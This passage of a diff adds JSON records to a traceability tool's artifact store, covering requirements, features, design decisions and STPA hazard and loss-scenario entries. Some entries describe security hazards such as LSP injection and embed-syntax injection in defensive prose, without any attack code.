+      "tags": [
+        "documents",
+        "embedding",
+        "architecture"
+      ],
+      "title": "Schema-driven embed modifiers with link traversal depth",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-C-10",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-10",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The LSP server processes textDocument/didChange and didSave notifications for any file URI sent by the editor, regardless of whether the file is within the project's configured source paths. An attacker who controls a file outside the project (e.g., via a symlink or workspace folder injection) can send crafted YAML content that is parsed by the validation pipeline, injecting artifacts or triggering schema violations that mask real issues.\n",
+      "id": "SH-7",
+      "links": [
+        {
+          "target": "SL-2",
+          "type": "leads-to-sec-loss"
+        },
+        {
+          "target": "SL-5",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "LSP server accepts didChange from non-project files, allowing code injection into validation",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Provides an enriched ArtifactInfo struct that resolves forward links, backlinks, custom fields, and referenced artifact titles at query time. Used by document generation and dashboard views for complete artifact context without separate lookups.\n",
+      "id": "FEAT-060",
+      "links": [
+        {
+          "target": "REQ-033",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-032",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "documents",
+        "model",
+        "phase-3"
+      ],
+      "title": "Enriched ArtifactInfo with links, backlinks, fields, and resolved titles",
+      "type": "feature"
+    },
+    {
+      "description": "The system must provide a single s-expression-based language for artifact filtering, traceability queries, feature model constraints, and variant-scoped validation. The language must support predicates over artifact fields (type, status, tags, custom fields), logical connectives (and, or, not, implies, excludes), quantifiers (forall, exists) over artifact sets, link traversal predicates (linked-by, linked-from, reachable-from), and aggregation (count, ratio). The same syntax must be usable in CLI --filter flags, schema traceability rules, feature model constraints, and binding validation rules. No alternative syntax or sugar — one canonical form.\n",
+      "id": "REQ-041",
+      "links": [
+        {
+          "target": "SC-VAR-004",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "core",
+        "query",
+        "s-expression"
+      ],
+      "title": "S-expression query and constraint language",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA WASM adapter component is loaded from a .wasm file distributed\n\nas a binary. The adapter's import() function is called with a\n\nReqIF source file containing 50 SpecObjects. The adapter returns\n\n80 artifacts — the original 50 plus 30 fabricated artifacts with\n\nvalid-looking IDs (REQ-051 through REQ-080) that link to\n\nexisting requirements,\ninflating coverage metrics [UCA-C-21].\n\nThe host has no way to verify the count because the source data\n\nformat is adapter-specific. Schema validation passes because the\n\nfabricated artifacts have valid types and fields.\n",
+      "id": "LS-C-13",
+      "links": [
+        {
+          "target": "UCA-C-21",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-14",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "WASM adapter returns fabricated artifacts",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The MCP server exposes artifact data, validation diagnostics, and project structure to unauthorized agents.\n",
+      "id": "SL-IMPL-002",
+      "links": [],
+      "status": "draft",
+      "tags": [],
+      "title": "Information disclosure via MCP server",
+      "type": "sec-loss"
+    },
+    {
+      "description": "\nReqIF adapter fails to import valid ReqIF XML,\ndiscarding\n\nall artifacts in the file.\n",
+      "id": "UCA-Q-1",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Non-essential commits opt out of trailer requirements via two mechanisms: conventional-commit type exemption (configurable list of types like chore, style, ci, docs, build) and an explicit Trace-skip trailer for edge cases.\n",
+      "id": "DD-013",
+      "links": [
+        {
+          "target": "REQ-018",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-019",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "git",
+        "traceability"
+      ],
+      "title": "Dual opt-out for commit traceability enforcement",
+      "type": "design-decision"
+    },
+    {
+      "description": "Future: add a SHA-256 hash of the snapshot data to enable integrity verification. For now, git history provides tamper evidence (commits are signed).\n",
+      "id": "SSC-IMPL-001",
+      "links": [
+        {
+          "target": "SH-IMPL-001",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Snapshot files SHOULD include a content hash",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "\nThe embed resolver uses cached data that doesn't reflect\n\nrecent changes. {{stats}}\nor {{coverage}}\nin a document\n\nshows numbers that don't match the actual project.\n",
+      "id": "H-IMPL-004",
+      "links": [
+        {
+          "target": "L-IMPL-001",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Embed resolver renders outdated data in export",
+      "type": "hazard"
+    },
+    {
+      "description": "Tie test execution results (JUnit XML, coverage reports) to GitHub releases as per-version evidence. Support fetching and caching from release assets.\n",
+      "id": "REQ-009",
+      "links": [
+        {
+          "target": "SC-6",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-6",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "evidence"
+      ],
+      "title": "Test results as release evidence",
+      "type": "requirement"
+    },
+    {
+      "description": "\nBridge schemas contain only link_types and traceability_rules.\n\nNo artifact_types. This prevents type conflicts between\n\nindependently-developed schemas.\n",
+      "id": "SC-IMPL-005",
+      "links": [
+        {
+          "target": "H-IMPL-005",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Bridge schemas MUST NOT define artifact types",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Declare direct dependencies only; discover transitive deps automatically.\n",
+      "id": "DD-017",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "accepted",
+      "tags": [
+        "cross-repo"
+      ],
+      "title": "Transitive dependency resolution",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe Starlark subset parser incorrectly extracts module names,\n\nversions,\nor git_override commits from MODULE.bazel. Cross-repo\n\nvalidation runs against the wrong repo versions,\nreporting\n\ntraceability coverage against mismatched baselines.\n",
+      "id": "H-11",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet MODULE.bazel parser silently misparses dependency declarations",
+      "type": "hazard"
+    },
+    {
+      "description": "Cross-module integration tests: dogfood validation, generic YAML roundtrip, schema merge, traceability matrix, query filters. Covers SWE.5 integration verification.\n",
+      "id": "FEAT-014",
+      "links": [
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "phase-1"
+      ],
+      "title": "Integration test suite",
+      "type": "feature"
+    },
+    {
+      "description": "\nOSLC client pushes locally corrupted data to the remote tool.\n",
+      "id": "UCA-O-7",
+      "links": [
+        {
+          "target": "H-8",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-9",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-9",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAn artifact's identifier changes (e.g.,\nREQ-042 becomes REQ-042a\n\nafter a rebase in the external tool).  Rivet's links still point\n\nto the old identifier.\n",
+      "id": "H-1.2",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet permits links to renamed artifact identifiers",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-L-6",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-6",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-17",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Proptest strategies for store, schema, link graph, and validation. Covers SWE.4 unit verification with randomized inputs.\n",
+      "id": "FEAT-013",
+      "links": [
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "phase-1"
+      ],
+      "title": "Property-based tests (proptest)",
+      "type": "feature"
+    },
+    {
+      "description": "The CLI's 'rivet import' / 'rivet sync' commands do not provide a source provenance check in contexts where the source URL or path has changed since the last import.\n",
+      "id": "SUCA-CLI-1",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-1",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "CLI does not validate artifact source provenance before import",
+      "type": "sec-uca"
+    },
+    {
+      "description": "serde_json's default parsing is bounded by available memory. Snapshot files are project-sized (kilobytes to megabytes), not user-uploaded. The risk is low but should be monitored if snapshot loading is ever exposed to untrusted input.\n",
+      "id": "SSC-IMPL-004",
+      "links": [
+        {
+          "target": "SH-IMPL-004",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Snapshot deserialization MUST use bounded parsing",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "\nWhen validating a variant,\nthe system must apply all traceability rules\n\nto the variant's effective artifact set and report any gaps. The variant\n\nvalidation result must be identical to what would be obtained by\n\nextracting only the variant's artifacts into a standalone project and\n\nrunning full validation.\n",
+      "id": "SC-VAR-001",
+      "links": [
+        {
+          "target": "H-VAR-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Per-variant validation must detect all traceability gaps within the variant's artifact subset",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nA ReqIF file contains SpecRelations (links) whose SOURCE or TARGET\n\nreferences point to SpecObjects in a different ReqIF file that was\n\nnot imported.  The ReqIF adapter resolves the UUID references\n\nagainst only the current file's SpecObjects,\nfinds no match,\nand\n\nsilently drops the links [UCA-Q-7].  The imported artifacts have\n\nno parent links,\nbreaking the traceability chain [H-1].  Coverage\n\nmetrics show zero parent coverage when links actually exist in\n\nthe cross-file context [H-3].\n",
+      "id": "LS-Q-3",
+      "links": [
+        {
+          "target": "UCA-Q-7",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SpecRelation targets reference missing SpecObjects",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Support automotive cybersecurity engineering artifacts aligned with ISO/SAE 21434 and ASPICE v4.0 SEC.1-4 processes. Cover TARA (assets, threats, risk assessment), cybersecurity goals/requirements, cybersecurity design, implementation, and verification.\n",
+      "id": "REQ-016",
+      "links": [
+        {
+          "target": "SC-4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cybersecurity",
+        "aspice",
+        "schema"
+      ],
+      "title": "Cybersecurity schema (ISO 21434 / ASPICE SEC.1-4)",
+      "type": "requirement"
+    },
+    {
+      "description": "Conditional validation rules (when/then syntax in schema YAML) evaluated as individual salsa tracked queries per artifact-rule pair. salsa dependency tracking ensures only affected rules re-evaluate when an artifact field changes. Schema extension with conditional-rules block supporting field equality, regex matching, and existence checks in the when clause, and required-fields and required-links in the then clause.\n",
+      "id": "FEAT-048",
+      "links": [
+        {
+          "target": "REQ-023",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-018",
+          "type": "implements"
+        },
+        {
+          "target": "DD-024",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "schema",
+        "salsa",
+        "phase-3"
+      ],
+      "title": "Conditional rule evaluation as salsa tracked queries",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn administrator in the external tool archives a module of\n\nrequirements (marking them as \"obsolete\" rather than deleting\n\nthem),\nbut the tool's OSLC interface reports this as a deletion\n\nevent in the TRS change log.  The OSLC client's process model\n\ndoes not distinguish between archival and deletion [UCA-O-5].\n\nIt removes the artifacts from the local store,\ncreating dangling\n\nlinks from design decisions and test cases that still reference\n\nthose requirements [H-1,\nH-2].\n",
+      "id": "LS-O-3",
+      "links": [
+        {
+          "target": "UCA-O-5",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Phantom deletion propagates through sync",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nPetgraph-based directed graph representing all resolved links\n\nbetween artifacts.  Ephemeral — rebuilt from YAML on each\n\ninvocation.  Supports cycle detection,\nreachability,\nand\n\ncoverage queries.\n",
+      "id": "PROC-LINKGRAPH",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "In-Memory Link Graph",
+      "type": "controlled-process"
+    },
+    {
+      "description": "VS Code extension renders dashboard views via custom LSP requests (rivet/render, rivet/treeData, rivet/css) instead of embedding a web server. Shell document pattern loads assets once, content updates via postMessage. Works in local and SSH Remote environments without port forwarding. Tree view with expandable artifact files and documents.\n",
+      "id": "FEAT-066",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "active",
+      "tags": [
+        "vscode",
+        "lsp",
+        "rendering",
+        "phase-3"
+      ],
+      "title": "VS Code LSP-based WebView rendering",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe LSP validation pipeline must include every phase that\n\n`rivet validate` runs:\nstructural,\nconditional rules,\ndocument\n\nreferences,\nand traceability rules. No phase may be skipped.\n",
+      "id": "SC-LSP-002",
+      "links": [
+        {
+          "target": "H-LSP-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "All validation phases in CLI MUST also run in LSP",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Indentation-aware YAML editor (yaml_edit.rs) for safe artifact file modification per YAML 1.2.2.\n",
+      "id": "FEAT-061",
+      "links": [
+        {
+          "target": "REQ-034",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-035",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "yaml",
+        "parsing",
+        "phase-3"
+      ],
+      "title": "yaml_edit.rs — lossless YAML artifact file editor per YAML 1.2.2",
+      "type": "feature"
+    },
+    {
+      "description": "\nOSLC client does not fetch remote changes when the TRS change\n\nlog indicates modifications since the last sync cursor.\n",
+      "id": "UCA-O-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nA developer renames an artifact from REQ-042 to REQ-042a. The\n\nsalsa database invalidates the queries for the renamed artifact's\n\nfile. However,\nother artifacts that link to REQ-042 are in\n\ndifferent files whose salsa inputs have not changed. The\n\nincremental validation for those files returns cached \"valid\"\n\nresults that still show links to REQ-042 as resolved [UCA-C-13].\n\nA full validation would detect the broken links. The dashboard\n\nshows 0 errors while a clean `rivet validate` shows 3 broken\n\nlinks.\n",
+      "id": "LS-C-8",
+      "links": [
+        {
+          "target": "UCA-C-13",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Incremental validation diverges from full validation after rename",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Verus requires/ensures annotations on core validation functions proving soundness (PASS implies all rules satisfied) and completeness (rule violated implies diagnostic emitted). Additional proofs for backlink symmetry, conditional rule consistency, and reachability correctness. Inline Rust annotations with SMT-based proof discharge.\n",
+      "id": "FEAT-050",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-026",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "testing",
+        "future"
+      ],
+      "title": "Verus soundness and completeness proofs for validation",
+      "type": "feature"
+    },
+    {
+      "description": "Import artifacts from meld's STPA YAML format (losses, hazards, system-constraints, control-structure, ucas, controller-constraints).\n",
+      "id": "FEAT-001",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-031",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stpa",
+        "adapter",
+        "phase-1"
+      ],
+      "title": "STPA YAML adapter",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for rivet impact command (FEAT-041). Verifies content hash computation, baseline diff against tags and commits, transitive link graph walk for affected artifacts, --since and --baseline flag handling, JSON output format, and dashboard integration highlighting impacted artifacts.\n",
+      "id": "TEST-020",
+      "links": [
+        {
+          "target": "REQ-024",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "traceability",
+        "baseline",
+        "swe-5"
+      ],
+      "title": "Impact analysis command tests",
+      "type": "feature"
+    },
+    {
+      "description": "Export auto-detects previous snapshot and renders delta columns in stats and coverage views. Zero config — presence of snapshot file is sufficient.\n",
+      "id": "FEAT-078",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Auto-delta rendering in HTML export",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-C-19",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-19",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-15",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The system must validate commit messages via a pre-commit hook, ensuring non-exempt commits reference at least one valid artifact ID in git trailers. Must support conventional-commit type exemptions and an explicit skip trailer for opt-out.\n",
+      "id": "REQ-018",
+      "links": [
+        {
+          "target": "SC-7",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "validation",
+        "git"
+      ],
+      "title": "Commit message validation at commit time",
+      "type": "requirement"
+    },
+    {
+      "description": "\nLibrary crate that performs schema validation,\nartifact parsing,\n\nlink resolution via petgraph,\ncoverage computation,\nand diff\n\ncalculation.  The authoritative engine for all traceability logic.\n",
+      "id": "CTRL-CORE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet Core Engine",
+      "type": "controller"
+    },
+    {
+      "description": "OSLC RM/QM client for syncing artifacts with Polarion, DOORS, and codebeamer. Support TRS for incremental sync.\n",
+      "id": "FEAT-011",
+      "links": [
+        {
+          "target": "REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-001",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "oslc",
+        "sync",
+        "phase-3"
+      ],
+      "title": "OSLC client for bidirectional sync",
+      "type": "feature"
+    },
+    {
+      "description": "\nDashboard does not display reload errors when hot-reload fails.\n",
+      "id": "UCA-D-4",
+      "links": [
+        {
+          "target": "H-16",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-18",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-18",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-15",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe OSLC client processes TRS change log entries sequentially,\n\nadvancing its sync cursor after each entry.  When a network error\n\noccurs mid-sync,\nthe cursor has already advanced past entries that\n\nwere fetched but not fully written to the local store [UCA-O-10].\n\nOn the next sync,\nthose entries are skipped because the cursor is\n\npast them,\nand the corresponding artifact updates are permanently\n\nlost [H-2].  The local store diverges from the external tool\n\nwithout any indication to the developer.\n",
+      "id": "LS-O-1",
+      "links": [
+        {
+          "target": "UCA-O-10",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "TRS change log cursor advances past failed entries",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Commit data is injected as ephemeral nodes into the petgraph link graph at analysis time, rather than materializing commit artifacts as YAML files on disk.\n",
+      "id": "DD-012",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "git",
+        "traceability"
+      ],
+      "title": "Runtime graph integration over materialized commit YAML",
+      "type": "design-decision"
+    },
+    {
+      "description": "Extends the document embed directive with modifier syntax supporting full, links, upstream, downstream, chain, and table display modes. Enables flexible artifact rendering within generated documents.\n",
+      "id": "FEAT-059",
+      "links": [
+        {
+          "target": "REQ-033",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-030",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "documents",
+        "embedding",
+        "phase-3"
+      ],
+      "title": "Rich artifact embed syntax with modifiers (full, links, upstream, downstream, chain, table)",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for conditional validation rules (FEAT-040). Verifies when/then syntax parsing in schema YAML, field value equality matching, regex pattern matching, field existence checks, required-fields enforcement, required-links enforcement, and conditional rule evaluation after static rules in the validation pipeline.\n",
+      "id": "TEST-019",
+      "links": [
+        {
+          "target": "REQ-023",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "validation",
+        "schema",
+        "swe-5"
+      ],
+      "title": "Conditional validation rules tests",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-7",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-7",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe LSP reports diagnostics for problems that are not real.\n\nCaused by:\nYAML type coercion misinterpretation,\nstale cached\n\ndiagnostics after schema changes,\nor overly strict validation.\n",
+      "id": "H-LSP-002",
+      "links": [
+        {
+          "target": "L-LSP-002",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-LSP-003",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP reports errors that don't exist (false positive)",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-VAR-002",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-VAR-002",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-VAR-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Constraint solver must run before variant-scoped validation",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nWhen schema files (rivet.yaml or schema YAML) change,\nall cached\n\nsalsa results must be invalidated and diagnostics recomputed.\n\nStale diagnostics from old schema rules are false positives.\n",
+      "id": "SC-LSP-004",
+      "links": [
+        {
+          "target": "H-LSP-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Schema changes MUST invalidate cached diagnostics",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nA MODULE.bazel file declares `bazel_dep(name=\"meld\",\nversion=\"2.0\")`\n\nand separately `git_override(module_name=\"meld\",\ncommit=\"abc123\")`.\n\nThe parser extracts the bazel_dep declaration and records\n\nmeld@2.0. It does not process the git_override because the\n\nfunction name is not in its recognized set [UCA-C-15]. Cross-repo\n\nvalidation loads meld@2.0 from the registry cache instead of\n\nthe pinned commit abc123. The traceability data comes from the\n\nwrong version of meld,\nand coverage results are meaningless [H-1].\n",
+      "id": "LS-C-10",
+      "links": [
+        {
+          "target": "UCA-C-15",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser extracts registry version instead of git_override commit",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nContinuous integration system (GitHub Actions) that runs Rivet\n\nvalidation as a quality gate on pull requests and merges.  Can\n\nblock merges if validation fails.\n",
+      "id": "CTRL-CI",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "CI Pipeline",
+      "type": "controller"
+    },
+    {
+      "description": "Imports artifacts from sphinx-needs JSON export format, mapping need types to Rivet artifact types.\n",
+      "id": "ARCH-ADAPT-NEEDSJSON",
+      "links": [
+        {
+          "target": "REQ-025",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "adapter",
+        "import"
+      ],
+      "title": "sphinx-needs JSON Import Adapter",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nReqIF adapter exports artifacts with stripped rich-text,\n\nlosing structural information.\n",
+      "id": "UCA-Q-5",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe feature model defines (implies adas (or asil-b asil-c asil-d)).\n\nA user creates variant selecting [autonomous,\nasil-a]. The constraint\n\n(implies autonomous (and adas asil-d)) should reject this,\nbut a bug\n\nin implication chaining only checks direct constraints,\nmissing the\n\ntransitive chain autonomous → adas → asil-b+. The variant is accepted,\n\nand validation runs on an artifact set missing ASIL-D-specific safety\n\nrequirements.\n",
+      "id": "LS-VAR-001",
+      "links": [
+        {
+          "target": "UCA-VAR-002",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-VAR-002",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Constraint implication chain not propagated — invalid variant accepted",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Self-analysis of LSP hazards using rivet's own STPA schema. 3 losses, 4 hazards, 7 system constraints covering false negatives, false positives, cascade errors, and misleading fix suggestions.\n",
+      "id": "FEAT-092",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "STPA analysis of LSP diagnostic accuracy",
+      "type": "feature"
+    },
+    {
+      "description": "\nOSLC client propagates a corrupted or semantically incorrect\n\nartifact from the remote tool to the local store.\n",
+      "id": "UCA-O-6",
+      "links": [
+        {
+          "target": "H-8",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Computes which artifacts are affected by changes since a given commit, using the link graph to propagate impact transitively.\n",
+      "id": "ARCH-CORE-IMPACT",
+      "links": [
+        {
+          "target": "REQ-024",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "analysis"
+      ],
+      "title": "Change Impact Analysis Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Malicious {{embed}} syntax in a document causes unexpected behavior during rendering — HTML injection, path traversal, or resource exhaustion.\n",
+      "id": "SL-IMPL-003",
+      "links": [],
+      "status": "draft",
+      "tags": [],
+      "title": "Code injection via embed syntax in documents",
